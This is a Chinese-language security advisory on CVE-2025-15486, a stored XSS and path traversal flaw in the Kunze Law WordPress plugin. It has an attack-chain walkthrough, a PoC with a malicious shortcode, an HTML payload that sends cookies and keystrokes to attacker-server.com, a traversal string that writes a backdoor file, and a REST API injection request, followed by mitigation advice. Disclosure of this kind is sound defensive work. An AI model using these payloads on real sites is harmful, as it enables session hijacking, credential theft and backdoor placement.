CVE-2025-15486 Kunze Law WordPress插件存储型XSS及路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-15486

漏洞类型

存储型XSS,路径遍历

CVSS评分

4.4 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Kunze Law WordPress插件

漏洞概述

Kunze Law是WordPress的一个法律信息展示插件，该插件在所有版本至2.1存在严重的安全漏洞。漏洞的根本原因是插件从远程服务器获取HTML内容后，在未进行任何输入清理或输出转义的情况下直接注入到页面中。这使得具有管理员级别权限的认证攻击者能够通过插件的shortcode功能注入任意Web脚本。当其他用户访问被注入恶意代码的页面时，这些脚本将自动执行，可能导致会话劫持、敏感信息窃取等严重后果。该漏洞仅影响多站点WordPress安装以及禁用了unfiltered_html功能的单站点安装。此外，攻击者还可以利用短代码名称参数中的路径遍历漏洞，将恶意HTML文件写入服务器上的任意可写目录，进一步扩大攻击面。

技术细节

漏洞主要存在于插件的两个核心功能中。首先是远程内容获取和注入机制，插件在kunze-law.php的第406行附近实现了从远程URL获取HTML内容的逻辑，获取后的内容直接通过do_shortcode或类似方式输出到页面，完全跳过了WordPress的sanitize和escape函数。其次是短代码名称参数处理，插件在第531行附近处理shortcode_name参数时，未对用户输入进行路径规范化检查，导致攻击者可以使用../进行目录遍历。攻击者首先需要获取WordPress管理员账户权限，然后通过WordPress后台或API构造包含恶意JavaScript代码的HTML页面托管在远程服务器，最后利用插件shortcode引用该恶意页面。存储型XSS payload会在页面加载时自动执行。对于路径遍历利用，攻击者可以通过构造特殊的shortcode_name参数值，将任意HTML内容写入服务器文件系统。这种组合攻击方式使得攻击者不仅能窃取用户cookie和会话信息，还能在服务器上部署后门文件。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标网站使用的Kunze Law插件版本，确认版本≤2.1且存在漏洞

STEP 2

Gain Admin Access

攻击者通过钓鱼、密码爆破或其他方式获取WordPress管理员级别账户凭证

STEP 3

Prepare Malicious Content

攻击者在可控服务器上托管包含恶意JavaScript的HTML页面，用于XSS攻击

STEP 4

Inject Payload via Shortcode

通过WordPress页面编辑器的shortcode块或REST API注入恶意shortcode，引用攻击者控制的远程HTML

STEP 5

Wait for User Access

当其他用户（如编辑者、订阅者）访问包含恶意代码的页面时，XSS payload自动执行

STEP 6

Exfiltrate Data

恶意脚本窃取用户cookie、会话令牌或其他敏感信息，并发送到攻击者服务器

STEP 7

Path Traversal Exploitation (Optional)

攻击者利用shortcode_name参数路径遍历，将webshell或后门文件写入服务器可写目录

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

## Stored XSS PoC (需要管理员权限)
[kunze-law url="http://attacker-server.com/malicious.html"]

## Malicious HTML content (malicious.html)
<!DOCTYPE html>
<html>
<head>
    <title>Legal Notice</title>
</head>
<body>
    <script>
        // Steal admin cookies/session
        document.location='http://attacker-server.com/steal?c='+encodeURIComponent(document.cookie);
        // Or perform keylogging
        document.addEventListener('keypress', function(e){
            fetch('http://attacker-server.com/log?k='+e.key);
        });
    </script>
</body>
</html>

## Path Traversal PoC (写入恶意文件到任意目录)
[ kunze-law url="backdoor.html" shortcode_name="../../../var/www/html/backdoor.html" ]

## WordPress REST API Exploitation
POST /wp-json/wp/v2/pages/{page_id}
Authorization: Bearer <admin_token>
{
    "content": "[kunze-law url=\"http://attacker.com/xss.html\"]"
}

影响范围

Kunze Law WordPress插件 ≤ 2.1

防御指南

临时缓解措施

立即在WordPress管理后台禁用Kunze Law插件，直至官方发布安全修复版本。对于必须使用该插件的场景，可以临时移除插件的shortcode功能并限制只有受信任的管理员才能使用，同时检查已发布页面是否包含恶意内容。对于路径遍历漏洞，建议通过Web应用防火墙（WAF）规则阻止shortcode_name参数中包含../等路径遍历字符的请求。